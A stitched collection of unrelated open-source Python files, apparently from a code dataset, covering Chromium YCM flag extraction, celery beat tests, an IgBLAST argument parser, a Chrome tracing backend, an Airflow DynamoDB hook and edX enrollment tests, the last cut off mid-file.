Compile flags used to build the default source file is assumed to be a
close-enough approximation for building |filename|.
Args:
chrome_root: (String) Absolute path to the root of Chromium checkout.
filename: (String) Absolute path to the source file.
Returns:
(String) Absolute path to substitute source file.
"""
blink_root = os.path.join(chrome_root, 'third_party', 'WebKit')
if filename.startswith(blink_root):
return os.path.join(blink_root, 'Source', 'core', 'Init.cpp')
else:
return os.path.join(chrome_root, 'base', 'logging.cc')
def GetBuildableSourceFile(chrome_root, filename):
"""Returns a buildable source file corresponding to |filename|.
A buildable source file is one which is likely to be passed into clang as a
source file during the build. For .h files, returns the closest matching .cc,
.cpp or .c file. If no such file is found, returns the same as
GetDefaultSourceFile().
Args:
chrome_root: (String) Absolute path to the root of Chromium checkout.
filename: (String) Absolute path to the target source file.
Returns:
(String) Absolute path to source file.
"""
if filename.endswith('.h'):
# Header files can't be built. Instead, try to match a header file to its
# corresponding source file.
alternates = ['.cc', '.cpp', '.c']
for alt_extension in alternates:
alt_name = filename[:-2] + alt_extension
if os.path.exists(alt_name):
return alt_name
return GetDefaultSourceFile(chrome_root, filename)
return filename
def GetNinjaBuildOutputsForSourceFile(out_dir, filename):
"""Returns a list of build outputs for filename.
The list is generated by invoking 'ninja -t query' tool to retrieve a list of
inputs and outputs of |filename|. This list is then filtered to only include
.o and .obj outputs.
Args:
out_dir: (String) Absolute path to ninja build output directory.
filename: (String) Absolute path to source file.
Returns:
(List of Strings) List of target names. Will return [] if |filename| doesn't
yield any .o or .obj outputs.
"""
# Ninja needs the path to the source file relative to the output build
# directory.
rel_filename = os.path.relpath(os.path.realpath(filename), out_dir)
p = subprocess.Popen(['ninja', '-C', out_dir, '-t', 'query', rel_filename],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, _ = p.communicate()
if p.returncode:
return []
# The output looks like:
# ../../relative/path/to/source.cc:
# outputs:
# obj/reative/path/to/target.source.o
# obj/some/other/target2.source.o
# another/target.txt
#
outputs_text = stdout.partition('\n outputs:\n')[2]
output_lines = [line.strip() for line in outputs_text.split('\n')]
return [target for target in output_lines
if target and (target.endswith('.o') or target.endswith('.obj'))]
def GetClangCommandLineForNinjaOutput(out_dir, build_target):
"""Returns the Clang command line for building |build_target|
Asks ninja for the list of commands used to build |filename| and returns the
final Clang invocation.
Args:
out_dir: (String) Absolute path to ninja build output directory.
build_target: (String) A build target understood by ninja
Returns:
(String or None) Clang command line or None if a Clang command line couldn't
be determined.
"""
p = subprocess.Popen(['ninja', '-v', '-C', out_dir,
'-t', 'commands', build_target],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode:
return None
# Ninja will return multiple build steps for all dependencies up to
# |build_target|. The build step we want is the last Clang invocation, which
# is expected to be the one that outputs |build_target|.
for line in reversed(stdout.split('\n')):
if 'clang' in line:
return line
return None
def GetClangCommandLineFromNinjaForSource(out_dir, filename):
"""Returns a Clang command line used to build |filename|.
The same source file could be built multiple times using different tool
chains. In such cases, this command returns the first Clang invocation. We
currently don't prefer one toolchain over another. Hopefully the tool chain
corresponding to the Clang command line is compatible with the Clang build
used by YCM.
Args:
out_dir: (String) Absolute path to Chromium checkout.
filename: (String) Absolute path to source file.
Returns:
(String or None): Command line for Clang invocation using |filename| as a
source. Returns None if no such command line could be found.
"""
build_targets = GetNinjaBuildOutputsForSourceFile(out_dir, filename)
for build_target in build_targets:
command_line = GetClangCommandLineForNinjaOutput(out_dir, build_target)
if command_line:
return command_line
return None
def GetClangOptionsFromCommandLine(clang_commandline, out_dir,
additional_flags):
"""Extracts relevant command line options from |clang_commandline|
Args:
clang_commandline: (String) Full Clang invocation.
out_dir: (String) Absolute path to ninja build directory. Relative paths in
the command line are relative to |out_dir|.
additional_flags: (List of String) Additional flags to return.
Returns:
(List of Strings) The list of command line flags for this source file. Can
be empty.
"""
clang_flags = [] + additional_flags
# Parse flags that are important for YCM's purposes.
clang_tokens = shlex.split(clang_commandline)
for flag_index, flag in enumerate(clang_tokens):
if flag.startswith('-I'):
# Relative paths need to be resolved, because they're relative to the
# output dir, not the source.
if flag[2] == '/':
clang_flags.append(flag)
else:
abs_path = os.path.normpath(os.path.join(out_dir, flag[2:]))
clang_flags.append('-I' + abs_path)
elif flag.startswith('-std'):
clang_flags.append(flag)
elif flag.startswith('-') and flag[1] in 'DWFfmO':
if flag == '-Wno-deprecated-register' or flag == '-Wno-header-guard':
# These flags causes libclang (3.3) to crash. Remove it until things
# are fixed.
continue
clang_flags.append(flag)
elif flag == '-isysroot':
# On Mac -isysroot <path> is used to find the system headers.
# Copy over both flags.
if flag_index + 1 < len(clang_tokens):
clang_flags.append(flag)
clang_flags.append(clang_tokens[flag_index + 1])
return clang_flags
def GetClangOptionsFromNinjaForFilename(chrome_root, filename):
"""Returns the Clang command line options needed for building |filename|.
Command line options are based on the command used by ninja for building
|filename|. If |filename| is a .h file, uses its companion .cc or .cpp file.
If a suitable companion file can't be located or if ninja doesn't know about
|filename|, then uses default source files in Blink and Chromium for
determining the commandline.
Args:
chrome_root: (String) Path to src/.
filename: (String) Absolute path to source file being edited.
Returns:
(List of Strings) The list of command line flags for this source file. Can
be empty.
"""
if not chrome_root:
return []
# Generally, everyone benefits from including Chromium's src/, because all of
# Chromium's includes are relative to that.
additional_flags = ['-I' + os.path.join(chrome_root)]
# Version of Clang used to compile Chromium can be newer then version of
# libclang that YCM uses for completion. So it's possible that YCM's libclang
# doesn't know about some used warning options, which causes compilation
# warnings (and errors, because of '-Werror');
additional_flags.append('-Wno-unknown-warning-option')
sys.path.append(os.path.join(chrome_root, 'tools', 'vim'))
from ninja_output import GetNinjaOutputDirectory
out_dir = os.path.realpath(GetNinjaOutputDirectory(chrome_root))
clang_line = GetClangCommandLineFromNinjaForSource(
out_dir, GetBuildableSourceFile(chrome_root, filename))
if not clang_line:
# If ninja didn't know about filename or it's companion files, then try a
# default build target. It is possible that the file is new, or build.ninja
# is stale.
clang_line = GetClangCommandLineFromNinjaForSource(
out_dir, GetDefaultSourceFile(chrome_root, filename))
if not clang_line:
return (additional_flags, [])
return GetClangOptionsFromCommandLine(clang_line, out_dir, additional_flags)
def FlagsForFile(filename):
"""This is the main entry point for YCM. Its interface is fixed.
Args:
filename: (String) Path to source file being edited.
Returns:
(Dictionary)
'flags': (List of Strings) Command line flags.
'do_cache': (Boolean) True if the result should be cached.
"""
abs_filename = os.path.abspath(filename)
chrome_root = FindChromeSrcFromFilename(abs_filename)
clang_flags = GetClangOptionsFromNinjaForFilename(chrome_root, abs_filename)
# If clang_flags could not be determined, then assume that was due to a
# transient failure. Preventing YCM from caching the flags allows us to try to
# determine the flags again.
should_cache_flags_for_file = bool(clang_flags)
final_flags = _default_flags + clang_flags
return {
'flags': final_flags,
'do_cache': should_cache_flags_for_file
}
|
moijes12/oh-mainline | refs/heads/master | vendor/packages/celery/celery/tests/test_bin/test_celerybeat.py | 32 | from __future__ import absolute_import
from __future__ import with_statement
import logging
import sys
from collections import defaultdict
from kombu.tests.utils import redirect_stdouts
from celery import beat
from celery import platforms
from celery.app import app_or_default
from celery.bin import celerybeat as celerybeat_bin
from celery.apps import beat as beatapp
from celery.tests.utils import AppCase
class MockedShelveModule(object):
shelves = defaultdict(lambda: {})
def open(self, filename, *args, **kwargs):
return self.shelves[filename]
mocked_shelve = MockedShelveModule()
class MockService(beat.Service):
started = False
in_sync = False
persistence = mocked_shelve
def start(self):
self.__class__.started = True
def sync(self):
self.__class__.in_sync = True
class MockBeat(beatapp.Beat):
running = False
def run(self):
self.__class__.running = True
class MockBeat2(beatapp.Beat):
Service = MockService
def install_sync_handler(self, b):
pass
class MockBeat3(beatapp.Beat):
Service = MockService
def install_sync_handler(self, b):
raise TypeError("xxx")
class test_Beat(AppCase):
def test_loglevel_string(self):
b = beatapp.Beat(loglevel="DEBUG")
self.assertEqual(b.loglevel, logging.DEBUG)
b2 = beatapp.Beat(loglevel=logging.DEBUG)
self.assertEqual(b2.loglevel, logging.DEBUG)
def test_init_loader(self):
b = beatapp.Beat()
b.init_loader()
def test_process_title(self):
b = beatapp.Beat()
b.set_process_title()
def test_run(self):
b = MockBeat2()
MockService.started = False
b.run()
self.assertTrue(MockService.started)
def psig(self, fun, *args, **kwargs):
handlers = {}
class Signals(platforms.Signals):
def __setitem__(self, sig, handler):
handlers[sig] = handler
p, platforms.signals = platforms.signals, Signals()
try:
fun(*args, **kwargs)
return handlers
finally:
platforms.signals = p
def test_install_sync_handler(self):
b = beatapp.Beat()
clock = MockService()
MockService.in_sync = False
handlers = self.psig(b.install_sync_handler, clock)
with self.assertRaises(SystemExit):
handlers["SIGINT"]("SIGINT", object())
self.assertTrue(MockService.in_sync)
MockService.in_sync = False
def test_setup_logging(self):
try:
# py3k
delattr(sys.stdout, "logger")
except AttributeError:
pass
b = beatapp.Beat()
b.redirect_stdouts = False
b.setup_logging()
with self.assertRaises(AttributeError):
sys.stdout.logger
@redirect_stdouts
def test_logs_errors(self, stdout, stderr):
class MockLogger(object):
_critical = []
def debug(self, *args, **kwargs):
pass
def critical(self, msg, *args, **kwargs):
self._critical.append(msg)
logger = MockLogger()
b = MockBeat3(socket_timeout=None)
b.start_scheduler(logger)
self.assertTrue(logger._critical)
@redirect_stdouts
def test_use_pidfile(self, stdout, stderr):
from celery import platforms
class create_pidlock(object):
instance = [None]
def __init__(self, file):
self.file = file
self.instance[0] = self
def acquire(self):
self.acquired = True
class Object(object):
def release(self):
pass
return Object()
prev, platforms.create_pidlock = platforms.create_pidlock, \
create_pidlock
try:
b = MockBeat2(pidfile="pidfilelockfilepid", socket_timeout=None)
b.start_scheduler()
self.assertTrue(create_pidlock.instance[0].acquired)
finally:
platforms.create_pidlock = prev
class MockDaemonContext(object):
opened = False
closed = False
def __init__(self, *args, **kwargs):
pass
def open(self):
self.__class__.opened = True
return self
__enter__ = open
def close(self, *args):
self.__class__.closed = True
__exit__ = close
class test_div(AppCase):
def setup(self):
self.prev, beatapp.Beat = beatapp.Beat, MockBeat
self.ctx, celerybeat_bin.detached = \
celerybeat_bin.detached, MockDaemonContext
def teardown(self):
beatapp.Beat = self.prev
def test_main(self):
sys.argv = [sys.argv[0], "-s", "foo"]
try:
celerybeat_bin.main()
self.assertTrue(MockBeat.running)
finally:
MockBeat.running = False
def test_detach(self):
cmd = celerybeat_bin.BeatCommand()
cmd.app = app_or_default()
cmd.run(detach=True)
self.assertTrue(MockDaemonContext.opened)
self.assertTrue(MockDaemonContext.closed)
def test_parse_options(self):
cmd = celerybeat_bin.BeatCommand()
cmd.app = app_or_default()
options, args = cmd.parse_options("celerybeat", ["-s", "foo"])
self.assertEqual(options.schedule, "foo")
|
ivan-fedorov/intellij-community | refs/heads/master | python/testData/formatter/alignInGenerators.py | 83 | def supprice():
if True:
if True:
agdrn = sum(VARS[drn + price] * md.c[drn][1] * md.c[drn][3] *
exp(md.c[drn][2] * VARS['SEEPAGE'] - md.c[drn][3] * pmp)
for drn in md.agdrn_nodes if drn in md.c)
|
andrejbranch/pyigblast | refs/heads/master | arg_parse.py | 1 | import argparse
import textwrap
from Bio import SeqIO
import os
import shutil
from multiprocessing import cpu_count
class blastargument_parser():
# call on all our file type parsers in the sequence_anlysis_method
def __init__(self):
"""A customized argument parser that does a LOT of error checking"""
self.parser = argparse.ArgumentParser(prog="igblast", formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent('''\
PyIgBlast
__________________________________________________________________________________________\n
PyIgBlast calls upon igblastn for nucleotides. Uses multiproecessing to split up fasta file.
Parses the output to a csv/tsv/JSON and allows upload to MongoDB or MySQL databases
author - Joran Willis
'''))
# Necessary Arguments
neces = self.parser.add_argument_group(
title='Necessary', description="These have to be included")
# query
neces.add_argument(
"-q", "--query", metavar="query.fasta", required=True, type=self._check_if_fasta, help="The fasta file to be input into igBlast")
# database path
neces.add_argument(
"-d", "--db_path", required=True, type=self._check_if_db_exists, help="The database path to the germline repertoire")
# internal_data path
neces.add_argument(
"-i", "--internal_data", required=True, type=self._check_if_db_exists, help="The database path to internal data repertoire")
# recommended options
recommended = self.parser.add_argument_group(
title="\nRecommended", description="Not necessary to run but recommended")
recommended.add_argument(
"-a", "--aux_path", type=self._check_if_aux_path_exists, help="The auxilariay path that contains the frame origins of the germline genes for each repertoire, \
helps produce translation and other metrics")
# IGBlast Specif Options
igspec = self.parser.add_argument_group(
title="\nIgBlast Sprecific", description="IgBlast Specific Options with a Default")
igspec.add_argument(
"-or", "--organism", default="human", choices=["human", "mouse"], help="The organism repeortire to blast against")
igspec.add_argument(
"-nV", "--num_v", default=3, type=int, help="How many V-genes to match?")
igspec.add_argument(
"-nD", "--num_d", default=3, type=int, help="How many D-genes to match?")
igspec.add_argument(
"-nJ", "--num_j", default=3, type=int, help="How many J-genes to match?")
igspec.add_argument("-dgm", "--d_gene_matches", default=5, type=int,
help="How many nuclodtieds in the D-gene must match to call it a hit")
igspec.add_argument("-s", "--domain", default="imgt", choices=[
"imgt", "kabat"], help="Which classification system do you want")
igspec.add_argument("-sT", "--show_translation", default=False,
action="store_true", help="Do you want to show the translation of the alignments")
# General Blast Settings
general = self.parser.add_argument_group(
title="\nGeneral Settings", description="General Settings for Blast")
general.add_argument(
"-x", '--executable', type=self._check_if_executable_exists,
help="The location of the executable, default is /usr/bin/igblastn")
general.add_argument(
"-o", "--out", help="output file prefix", default="igblast_out")
general.add_argument("-e", "--e_value", type=str, default="1e-15",
help="Real value for excpectation value threshold in blast, put in scientific notation")
general.add_argument("-w", "--word_size", type=int,
default=4, help="Word size for wordfinder algorithm")
general.add_argument("-pm", "--penalty_mismatch", type=int,
default=0, help="Penalty for nucleotide mismatch")
general.add_argument(
"-rm", "--reward_match", type=int, default=0, help="Reward for nucleotide match")
general.add_argument("-mT", "--max_target_seqs", type=int, default=500,
help="Maximum number of alingned sequences to iterate through at a time")
general.add_argument(
"-nP", "--num_procs", type=int, default=cpu_count(),
help="How many do you want to split the job across, default is the number of processors")
formatter = self.parser.add_argument_group(
title="Formatting Options", description="Formatting options mostly available"
)
formatter.add_argument("-f", "--format_options", type=str, default="default", help="default is a tab seperated format of\n\n\
qseqid sseqid pident length mismatch gapopen qstart qend sstart send\n\n\
The format file is in the database path as format_template.txt. Uncomment out the metrics you want to use")
formatter.add_argument("-z","--zip",default=False,action="store_true",help="Zip up all output files")
formatter.add_argument("-c","--concatenate",default=True,action="store_false",help="Turn off automatic concatenation and deletion of temporary files. Files are split up at the beginning to run across multiple processors")
json_specific = self.parser.add_argument_group(
title="\nOutput parsing settings",description = "These are the options for creating a JSON files from the blastoutput that is easily uploaded to a mongo database")
json_specific.add_argument("-j","--json",action="store_true",default=False,help="Use the JSON output option that will format the text driven igblast output to a json document")
json_specific.add_argument("-jp","--json_prefix",default="igblast_output",help="The prefix for json_output files")
# one special boolean case
self.show_translation = False
# return the arguments
self.args = self.parser.parse_args()
# get them ready to ship out
self._make_args_dict()
# helper functions
def _check_if_fasta(self, f_file):
try:
SeqIO.parse(f_file, "fasta").next()
return f_file
# return SeqIO.parse(f_file,"fasta")
except StopIteration:
msg = "{0} is not a fasta file\n".format(f_file)
raise argparse.ArgumentTypeError(msg)
def _check_if_executable_exists(self, x_path):
if not os.path.exists(x_path):
msg = "path to executable {0} does not exist, use -h for help\n".format(
x_path)
raise argparse.ArgumentTypeError(msg)
if not os.access(x_path, os.R_OK):
msg1 = "executable {0} does not permission to run\n".format(x_path)
raise argparse.ArgumentTypeError(msg1)
else:
return x_path
def _check_if_db_exists(self, db_path):
if os.path.exists(db_path):
return db_path
else:
msg = "{0} path for does not exist for database\n".format(db_path)
raise argparse.ArgumentTypeError(msg)
def _check_if_aux_path_exists(self, aux_path):
if os.path.exists(aux_path):
return aux_path
else:
msg = "{0} path for aux files does not exist\n".format(aux_path)
raise argparse.ArgumentTypeError(msg)
def _make_args_dict(self):
# copy internal data directory to current location
# shutil.copytree(self.args.internal_data,'.')
try:
shutil.copytree(self.args.internal_data, './internal_data')
except OSError:
print "Internal Data direcotry file exists in this directory, skipping..."
self.args_dict = {
'-query': self.args.query,
'-organism': self.args.organism,
'-num_alignments_V': self.args.num_v,
'-num_alignments_D': self.args.num_d,
'-num_alignments_J': self.args.num_j,
'-min_D_match': self.args.d_gene_matches,
'-domain_system': self.args.domain,
'-out': self.args.out,
'-evalue': self.args.e_value,
'-word_size': self.args.word_size,
'-max_target_seqs': self.args.max_target_seqs,
'-germline_db_V': "{0}{1}_gl_V".format(self.args.db_path, self.args.organism),
'-germline_db_D': "{0}{1}_gl_D".format(self.args.db_path, self.args.organism),
'-germline_db_J': "{0}{1}_gl_J".format(self.args.db_path, self.args.organism)
}
# add bool opition
if self.args.penalty_mismatch:
self.args_dict['-penalty'] = self.args.penalty_mismatch
if self.args.reward_match:
self.args_dict['-reward'] = self.args.reward_match
if self.args.show_translation:
self.show_translation = True
if self.args.aux_path:
self.args_dict['-auxiliary_data'] = "{0}{1}_gl.aux".format(
self.args.aux_path, self.args.organism)
# add formatting option
if self.args.format_options == 'default':
self.args_dict['-outfmt'] = 7
else:
self.args.format_options = self._check_if_db_exists(
self.args.format_options)
formatting_titles = []
for line in open(self.args.format_options).readlines():
if line.startswith("#"):
continue
else:
formatting_titles.append(line.split()[0])
format = "7 " + " ".join(formatting_titles)
self.args_dict['-outfmt'] = format
# only non memeber functions needed
def return_parsed_args(self):
return self.args_dict
def return_command_line(self):
'''return solid strin of command line'''
return ' '.join(self.return_command_line_from_dict(self.args_dict))
def return_command_line_from_dict(self, cline_dict):
'''return command line as a list to put in subprocess
--args
cline_dict - The command line dictionary to return. We add in the executable'''
if self.args.executable:
cline = [self.args.executable]
else:
cline = [self._check_if_executable_exists("/usr/bin/igblastn")]
for command in cline_dict:
cline.append(str(command))
cline.append(str(self.args_dict[command]))
return cline
if __name__ == '__main__':
args = blastargument_parser().return_command_line()
print args
|
codenote/chromium-test | refs/heads/master | tools/telemetry/telemetry/core/chrome/tracing_backend.py | 4 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cStringIO
import json
import logging
import socket
import threading
from telemetry.core import util
from telemetry.core.chrome import trace_event_importer
from telemetry.core.chrome import trace_result
from telemetry.core.chrome import websocket
class TracingUnsupportedException(Exception):
pass
class TraceResultImpl(object):
def __init__(self, tracing_data):
self._tracing_data = tracing_data
def Serialize(self, f):
f.write('{"traceEvents": [')
d = self._tracing_data
# Note: we're not using ','.join here because the strings that are in the
# tracing data are typically many megabytes in size. In the fast case, f is
# just a file, so by skipping the in memory step we keep our memory
# footprint low and avoid additional processing.
if len(d) == 0:
pass
elif len(d) == 1:
f.write(d[0])
else:
f.write(d[0])
for i in range(1, len(d)):
f.write(',')
f.write(d[i])
f.write(']}')
def AsTimelineModel(self):
f = cStringIO.StringIO()
self.Serialize(f)
return trace_event_importer.Import(
f.getvalue())
class TracingBackend(object):
def __init__(self, devtools_port):
debugger_url = 'ws://localhost:%i/devtools/browser' % devtools_port
self._socket = websocket.create_connection(debugger_url)
self._next_request_id = 0
self._cur_socket_timeout = 0
self._thread = None
self._tracing_data = []
def BeginTracing(self):
self._CheckNotificationSupported()
req = {'method': 'Tracing.start'}
self._SyncRequest(req)
# Tracing.start will send asynchronous notifications containing trace
# data, until Tracing.end is called.
self._thread = threading.Thread(target=self._TracingReader)
self._thread.start()
def EndTracing(self):
req = {'method': 'Tracing.end'}
self._SyncRequest(req)
self._thread.join()
self._thread = None
def GetTraceResultAndReset(self):
assert not self._thread
ret = trace_result.TraceResult(
TraceResultImpl(self._tracing_data))
self._tracing_data = []
return ret
def Close(self):
if self._socket:
self._socket.close()
self._socket = None
def _TracingReader(self):
while self._socket:
try:
data = self._socket.recv()
if not data:
break
res = json.loads(data)
logging.debug('got [%s]', data)
if 'Tracing.dataCollected' == res.get('method'):
value = res.get('params', {}).get('value')
self._tracing_data.append(value)
elif 'Tracing.tracingComplete' == res.get('method'):
break
except (socket.error, websocket.WebSocketException):
logging.warning('Timeout waiting for tracing response, unusual.')
def _SyncRequest(self, req, timeout=10):
self._SetTimeout(timeout)
req['id'] = self._next_request_id
self._next_request_id += 1
data = json.dumps(req)
logging.debug('will send [%s]', data)
self._socket.send(data)
def _SetTimeout(self, timeout):
if self._cur_socket_timeout != timeout:
self._socket.settimeout(timeout)
self._cur_socket_timeout = timeout
def _CheckNotificationSupported(self):
"""Ensures we're running against a compatible version of chrome."""
req = {'method': 'Tracing.hasCompleted'}
self._SyncRequest(req)
while True:
try:
data = self._socket.recv()
except (socket.error, websocket.WebSocketException):
raise util.TimeoutException(
'Timed out waiting for reply. This is unusual.')
logging.debug('got [%s]', data)
res = json.loads(data)
if res['id'] != req['id']:
logging.debug('Dropped reply: %s', json.dumps(res))
continue
if res.get('response'):
raise TracingUnsupportedException(
'Tracing not supported for this browser')
elif 'error' in res:
return
|
wileeam/airflow | refs/heads/master | airflow/providers/amazon/aws/hooks/aws_dynamodb_hook.py | 2 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module contains the AWS DynamoDB hook
"""
from airflow.exceptions import AirflowException
from airflow.providers.amazon.aws.hooks.aws_hook import AwsHook
class AwsDynamoDBHook(AwsHook):
"""
Interact with AWS DynamoDB.
:param table_keys: partition key and sort key
:type table_keys: list
:param table_name: target DynamoDB table
:type table_name: str
:param region_name: aws region name (example: us-east-1)
:type region_name: str
"""
def __init__(self,
table_keys=None,
table_name=None,
region_name=None,
*args, **kwargs):
self.table_keys = table_keys
self.table_name = table_name
self.region_name = region_name
self.conn = None
super().__init__(*args, **kwargs)
def get_conn(self):
self.conn = self.get_resource_type('dynamodb', self.region_name)
return self.conn
def write_batch_data(self, items):
"""
Write batch items to DynamoDB table with provisioned throughout capacity.
"""
dynamodb_conn = self.get_conn()
try:
table = dynamodb_conn.Table(self.table_name)
with table.batch_writer(overwrite_by_pkeys=self.table_keys) as batch:
for item in items:
batch.put_item(Item=item)
return True
except Exception as general_error:
raise AirflowException(
'Failed to insert items in dynamodb, error: {error}'.format(
error=str(general_error)
)
)
|
devs1991/test_edx_docmode | refs/heads/master | lms/djangoapps/instructor/tests/test_enrollment.py | 13 | # -*- coding: utf-8 -*-
"""
Unit tests for instructor.enrollment methods.
"""
import json
import mock
from mock import patch
from abc import ABCMeta
from courseware.models import StudentModule
from django.conf import settings
from django.test import TestCase
from django.utils.translation import get_language
from django.utils.translation import override as override_language
from nose.plugins.attrib import attr
from ccx_keys.locator import CCXLocator
from student.tests.factories import UserFactory
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from lms.djangoapps.ccx.tests.factories import CcxFactory
from student.models import CourseEnrollment, CourseEnrollmentAllowed
from student.roles import CourseCcxCoachRole
from student.tests.factories import (
AdminFactory
)
from instructor.enrollment import (
EmailEnrollmentState,
enroll_email,
get_email_params,
reset_student_attempts,
send_beta_role_email,
unenroll_email,
render_message_to_string,
)
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from submissions import api as sub_api
from student.models import anonymous_id_for_user
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase, TEST_DATA_SPLIT_MODULESTORE
@attr('shard_1')
class TestSettableEnrollmentState(TestCase):
""" Test the basis class for enrollment tests. """
def setUp(self):
super(TestSettableEnrollmentState, self).setUp()
self.course_key = SlashSeparatedCourseKey('Robot', 'fAKE', 'C-%-se-%-ID')
def test_mes_create(self):
"""
Test SettableEnrollmentState creation of user.
"""
mes = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False
)
# enrollment objects
eobjs = mes.create_user(self.course_key)
ees = EmailEnrollmentState(self.course_key, eobjs.email)
self.assertEqual(mes, ees)
class TestEnrollmentChangeBase(TestCase):
"""
Test instructor enrollment administration against database effects.
Test methods in derived classes follow a strict format.
`action` is a function which is run
the test will pass if `action` mutates state from `before_ideal` to `after_ideal`
"""
__metaclass__ = ABCMeta
def setUp(self):
super(TestEnrollmentChangeBase, self).setUp()
self.course_key = SlashSeparatedCourseKey('Robot', 'fAKE', 'C-%-se-%-ID')
def _run_state_change_test(self, before_ideal, after_ideal, action):
"""
Runs a state change test.
`before_ideal` and `after_ideal` are SettableEnrollmentState's
`action` is a function which will be run in the middle.
`action` should transition the world from before_ideal to after_ideal
`action` will be supplied the following arguments (None-able arguments)
`email` is an email string
"""
# initialize & check before
print "checking initialization..."
eobjs = before_ideal.create_user(self.course_key)
before = EmailEnrollmentState(self.course_key, eobjs.email)
self.assertEqual(before, before_ideal)
# do action
print "running action..."
action(eobjs.email)
# check after
print "checking effects..."
after = EmailEnrollmentState(self.course_key, eobjs.email)
self.assertEqual(after, after_ideal)
@attr('shard_1')
class TestInstructorEnrollDB(TestEnrollmentChangeBase):
""" Test instructor.enrollment.enroll_email """
def test_enroll(self):
before_ideal = SettableEnrollmentState(
user=True,
enrollment=False,
allowed=False,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False
)
action = lambda email: enroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_again(self):
before_ideal = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False,
)
after_ideal = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False,
)
action = lambda email: enroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_nouser(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False,
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=False,
)
action = lambda email: enroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_nouser_again(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=False,
)
action = lambda email: enroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_nouser_autoenroll(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False,
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=True,
)
action = lambda email: enroll_email(self.course_key, email, auto_enroll=True)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_nouser_change_autoenroll(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=True,
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=False,
)
action = lambda email: enroll_email(self.course_key, email, auto_enroll=False)
return self._run_state_change_test(before_ideal, after_ideal, action)
@attr('shard_1')
class TestInstructorUnenrollDB(TestEnrollmentChangeBase):
""" Test instructor.enrollment.unenroll_email """
def test_unenroll(self):
before_ideal = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=True,
enrollment=False,
allowed=False,
auto_enroll=False
)
action = lambda email: unenroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_unenroll_notenrolled(self):
before_ideal = SettableEnrollmentState(
user=True,
enrollment=False,
allowed=False,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=True,
enrollment=False,
allowed=False,
auto_enroll=False
)
action = lambda email: unenroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_unenroll_disallow(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=True
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False
)
action = lambda email: unenroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_unenroll_norecord(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False
)
action = lambda email: unenroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
@attr('shard_1')
class TestInstructorEnrollmentStudentModule(SharedModuleStoreTestCase):
""" Test student module manipulations. """
@classmethod
def setUpClass(cls):
super(TestInstructorEnrollmentStudentModule, cls).setUpClass()
cls.course = CourseFactory(
name='fake',
org='course',
run='id',
)
# pylint: disable=no-member
cls.course_key = cls.course.location.course_key
with cls.store.bulk_operations(cls.course.id, emit_signals=False):
cls.parent = ItemFactory(
category="library_content",
parent=cls.course,
publish_item=True,
)
cls.child = ItemFactory(
category="html",
parent=cls.parent,
publish_item=True,
)
cls.unrelated = ItemFactory(
category="html",
parent=cls.course,
publish_item=True,
)
def setUp(self):
super(TestInstructorEnrollmentStudentModule, self).setUp()
self.user = UserFactory()
parent_state = json.dumps({'attempts': 32, 'otherstuff': 'alsorobots'})
child_state = json.dumps({'attempts': 10, 'whatever': 'things'})
unrelated_state = json.dumps({'attempts': 12, 'brains': 'zombie'})
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=self.parent.location,
state=parent_state,
)
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=self.child.location,
state=child_state,
)
StudentModule.objects.create(
